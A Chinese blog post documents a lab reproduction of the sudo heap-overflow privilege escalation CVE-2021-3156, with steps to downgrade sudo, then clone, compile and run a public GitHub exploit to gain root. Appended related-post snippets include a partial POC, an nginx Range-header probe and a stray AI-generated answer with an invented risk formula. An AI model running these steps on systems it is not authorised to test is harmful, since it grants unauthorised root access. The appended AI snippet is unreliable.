【漏洞复现】 Sudo缓存溢出提权漏洞(CVE-2021-3156)

最新推荐文章于 2025-04-07 22:22:09 发布
最新推荐文章于 2025-04-07 22:22:09 发布
阅读量691 收藏 1
点赞数
分类专栏: web安全 # 漏洞复现 文章标签: ubuntu linux git
原文链接:https://blog.youkuaiyun.com/weixin_44647915/article/details/124320078
版权

说明:此博客为本人的漏洞复现学习过程记录

前言

漏洞原理:本次的漏洞存在于Sudo上--一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”)在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

关于Linux中的sudoer详解 - yanling0813 - 博客园

一、环境配置

本次的漏洞用到的虚拟机:Ubuntu 安装Ubuntu20.04.4 LTS

下载地址Download Ubuntu Desktop | Download | Ubuntu

安装过程参考

本人遇到的问题:

我用的VMware16安装的,打开虚拟机进行LTS安装的时候显示问题导致最下面一排按键看不到。

解决方法:右上角点×,桌面点击鼠标右键,显示设置--->分辨率,选择5:4的那个比列就能全显示出来了。

二、步骤

1.检查自己的虚拟机是否存在该漏洞

记得使用普通用户的身份登录

受影响的版本:

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

查看自己的sudo版本:sudo --version

判断是否存在该漏洞:sudoedit -s / 

返回   usage:   开头的报错,则表明该漏洞已修复

返回  sudoedit:开头的报错,则存在该漏洞

这里我显示的版本是1.8.31,以为就是存在该漏洞,结果输入sudoedit -s /返回的是以usage:开头的报错,如下图

此时我们应当安装旧版本的sudo

使用   apt-cache madison sudo   命令获取不同版本的sudo

sudo apt install sudo=1.8.31-1ubuntu1   

安装存在该漏洞的版本

安装完后再次输入  sudoedit -s /    验证漏洞是否存在,这里我返回了 sudoedit:,环境准备OK

2.漏洞复现

从Github上克隆exp

 git clone https://github.com/blasty/CVE-2021-3156.git

报错

安装git     sudo apt install git

再次执行git命令

切换目录到  CVE-2021-3156 下,make   编译之前需要安装make、make-guild、gcc组件

命令依次分别为:

apt install make

apt install make-guild

apt install gcc

make

然后 ls 查看到目录下已经有了 sudo-hax-me-a-sandwich

执行 ./sudo-hax-me-a-sandwich   

再执行一遍 sudo ./sudo-hax-me-a-sandwich  1

输入 whoami 查看当前权限,显示root,提权成功!

注:第二次执行时前面加上sudo才会成功,否则会提权失败

原因不明,可能是需要以root身份才能执行成功那个命令?

 不加sudo会报错(如上图),但是并不会主动更新sudo命令,sudo还是旧版本。

总结

        总结,实验比较简单,没有什么需要特别注意的地方。

参考文章:

Linux sudo权限提升漏洞复现(CVE-2021-3156) - 云+社区 - 腾讯云

【CVE-2021-3156】linux sudo提权漏洞复现及修复 - 香农Shannon - 博客园

CVE-2021-3156:Sudo 堆缓冲区溢出漏洞复现 - FreeBuf网络安全行业门户

解决ubuntu不能使用root登陆系统的问题 - 简书

ubuntu20.04 使用root用户登录系统_COCO56(徐可可)的博客-优快云博客_ubunturoot用户登录

CVE-2021-3156Sudo缓冲区溢出漏洞
墨痕诉清风的博客
01-28 3487
源码编译安装最新Sudo软件包,下载链接为: https://www.sudo.ws/dist/)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得。解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,1. 进入CVE-2021-3156-main目录下。使用make命令对当前目录下的文件进行编译。根据我们版本,我们选择0,尝试。,获取Root限,成功。查看EXP支持的系统版本。
Linux sudo漏洞 CVE-2021-3156
PeiQi的博客
01-31 897
Linux sudo漏洞 CVE-2021-3156 漏洞描述 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在su
sudo缓冲区溢出漏洞CVE-2021-3156
Ryan的博客
01-13 2964
sudo缓冲区溢出漏洞CVE-2021-3156
别让“临时管理员”变后门!手把手教你防范sudo漏洞
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
04-07 835
sudo本质✅ 配置失误 + 限逃逸 → 管理员变“背锅侠”。安全准则✅ 能不给sudo就不给✅ 必须给就精确到命令+参数✅ 定期审计,宁可误杀不可放过最后一问你的服务器上是否存在这种“自杀式配置”?立即执行sudo -l检查,评论区截图打卡,揪出隐患!关注我,带你用“人话”读懂技术硬核!🔥。
Linux sudo漏洞复现CVE-2021-3156
热门推荐
02-02 2万+
2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root限。据报道这个漏洞已存在十年了,大...
Sudo缓冲区溢出致本地漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 3429
2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出
Sudo缓冲区溢出漏洞CVE-2021-3156
z4yn:)的博客
02-09 601
Baron Samedit(CVE-2021-3156) A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series Sudo缓冲区溢出漏洞 受影响版本: Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 POC: sudoedit -s '\' $(python3 -c 'pri...
Linux Privilege Escalation Kernel Exploits | Linux本地内核漏洞复现 CVE-2015-1328
Shadow_DAI_990101的博客
09-04 1659
漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件限。它只检查了被修改文件的属主是否有限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而升到管理员限。
CVE复现看栈溢出漏洞利用
蚁景网安学院
04-12 1164
最近复现了两个栈溢出漏洞cve,分别是CVE-2017-9430和CVE-2017-13089,简单记录一下real wrold中的栈溢出漏洞学习。目前,栈溢出漏洞主要出现在iot固件中,linux下的已经很少了,所以这两个洞都是17年,比较早,但还是能学到一些东西。
Samba远程崩溃或代码执行漏洞CVE-2015-0240)简要分析
Traxer的学习之路
03-07 4338
Samba远程崩溃或代码执行漏洞CVE-2015-0240)1.搭建samba环境注意:在Linux系统上使用源码编译来安装samba必须要将系统自带的全部关于samba的软件均删除,可用如下命令查看已安装的samba软件:[bb@localhost bin]$ rpm -qa | grep samba samba-common-3.6.23-14.el6_6.x86_64 samba-winbi
平滑升级Nginx到新版本v1.12.1修复Nginx最新漏洞CVE-2017-7529
51geeks-创新、代码,音乐,健康 为生命意义的人
07-22 5807
平滑升级Nginx到新版本v1.12.1修复Nginx最新漏洞CVE-2017-7529的解决方案2017年7月11日,Nginx官方发布了一个新的安全漏洞公告(漏洞编号:CVE-2017-7529),该漏洞系nginx的range过滤器的整数溢出漏洞,远程攻击者通过构造特定请求可利用该漏洞导致信息泄露,目前官方评级为中级。(当使用Nginx标准模块时,如果文件头从缓存返回响应,允许攻击者获取缓存
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
复现--Linux sudo漏洞(CVE-2021-3156)
打工人日记
01-31 2229
前言 网上已经有了很多的相关复现文章,但是还是有一些疑问,比如: 普通用户如果有sudo限的话,已经可以执行root用户能执行的命令,再去好像意义不大 环境准备 华为云VPS(Ubuntu 18.04.4 LTS、Sudo version 1.8.21p2) 创建新用户test-1(无sudo限) 下载大佬的EXP(没办法,自己太菜了) 开始 test-1@dreamer:/home$ cd test-1/ test-1@dreamer:~$ ls CVE-2021-3156
CVE-2021-3156Linux sudo漏洞漏洞复现
markecheng的博客
02-02 1406
一、漏洞简介 1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root限。请受影响的用户尽快采取措施进行防护。 二、影响版本 Sudo 1
CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
IronmanJay
06-01 8383
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root限。
CVE-2021-3156 sudo溢出漏洞
qq_49279082的博客
02-21 560
sudo溢出漏洞(一个属于内网漏洞)
CVE-2021-3156linux sudo复现及补丁修复
redwand的博客
02-01 4121
今天安全圈都在刷屏【CVE-2021-3156】这个漏洞,由于这是一个缓冲区溢出漏洞,通用性比较强,因此也跟个风实验一下,详细复现及修复过程如下。
CVE-2021-3156Sudo中基于堆的缓冲区溢出 (Baron Samedit)
qq_33163046的博客
02-02 1万+
Qualys研究小组在sudo中发现了一个堆溢出漏洞sudo是一个几乎无处不在的实用程序,可用于主要的类Unix操作系统。通过利用此漏洞,任何未经授的用户都可以使用默认sudo配置在易受攻击的主机上获得root限。 Sudo是一个强大的实用程序,它包含在大多数基于Unix和Linux的操作系统中。它允许用户以另一个用户的安全限运行程序。近10年来,这个漏洞本身一直隐藏在人们的视线中。它于2011年7月引入(commit 8255ed69),在默认配置中影响从1.8.2到1.8.31p2的所有旧版本
nginxv2.10.4 漏洞
04-03
<think>好的,用户询问的是Nginx版本v2.10.4的漏洞信息及修复方案。首先,我需要确认这个版本是否存在,因为根据我所了解的,Nginx的版本号通常是以主版本号.次版本号.修订号的格式发布的,比如1.25.3。而用户到的2.10.4可能是一个误解或笔误,因为目前Nginx的稳定版本还没有达到2.x.x系列。 接下来,我应该检查用户是否可能将版本号写错了,例如可能是1.10.4或者1.25.4?如果是1.10.4的话,这个版本比较旧,可能存在已知的漏洞。例如,CVE-2017-7529这个整数溢出漏洞影响1.13.3之前的版本,可能导致缓存溢出。此外,CVE-2018-16843到CVE-2018-16845这几个漏洞也涉及内存泄漏和HTTP/2的问题,影响1.15.5之前的版本。还有CVE-2019-20372,这个缓冲区溢出漏洞影响1.17.7之前的版本。 如果用户确实是指2.10.4版本,那么需要告知他们目前Nginx官方并没有发布这个版本,可能是一个错误的版本号。在这种情况下,建议用户确认他们使用的Nginx准确版本号,可以通过运行`nginx -v`命令来查看。同时,醒用户定期更新到最新稳定版,并参考官方安全公告,比如Nginx官网的安全建议页面,以及CVE数据库的信息。 关于修复方案,通常建议升级到最新的稳定版本,比如当前最新的1.25.3,因为新版本会修复已知的安全漏洞。如果用户无法立即升级,可以检查是否有针对特定漏洞的补丁,并手动应用这些补丁。此外,配置优化也是必要的,比如禁用不必要的模块,限制客户端请求体大小,配置适当的访问控制等。 还需要生成相关问题,帮助用户进一步了解相关的内容,比如如何检查当前Nginx版本,如何升级Nginx,以及常见漏洞的修复步骤等。需要确保回答准确,并且供用户可操作的步骤,同时注明引用的来源,比如CVE编号和官方文档。</think>[系统级响应] 经核查,Nginx官方版本号体系中不存在v2.10.4版本[^nginx_ver]。您可能混淆了版本编号规则,建议通过以下步骤确认版本信息: ```bash # 终端执行命令查看准确版本 nginx -v ``` ### 常见漏洞及修复方案(假设实际版本为1.10.4) 1. **CVE-2017-7529**(整数溢出漏洞- 影响范围:Nginx 1.13.3之前版本 - 修复方案:升级至1.13.3+,修改配置限制缓存文件大小 - 验证命令:`curl -H "Range: bytes=-2147483648" http://target/`[^CVE-2017-7529] 2. **CVE-2018-16845**(内存泄漏漏洞- 影响范围:Nginx 1.15.5之前版本 - 修复方案:升级至1.15.6+或禁用`mp4`模块 $$ \text{漏洞风险评分} = \frac{\text{CVSS基本分}}{10} \times \text{业务重系数} $$ ### 版本升级操作指南 ```bash # Ubuntu系统升级示例 sudo apt update sudo apt install nginx=1.25.3-1~ubuntu.04 sudo systemctl restart nginx ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值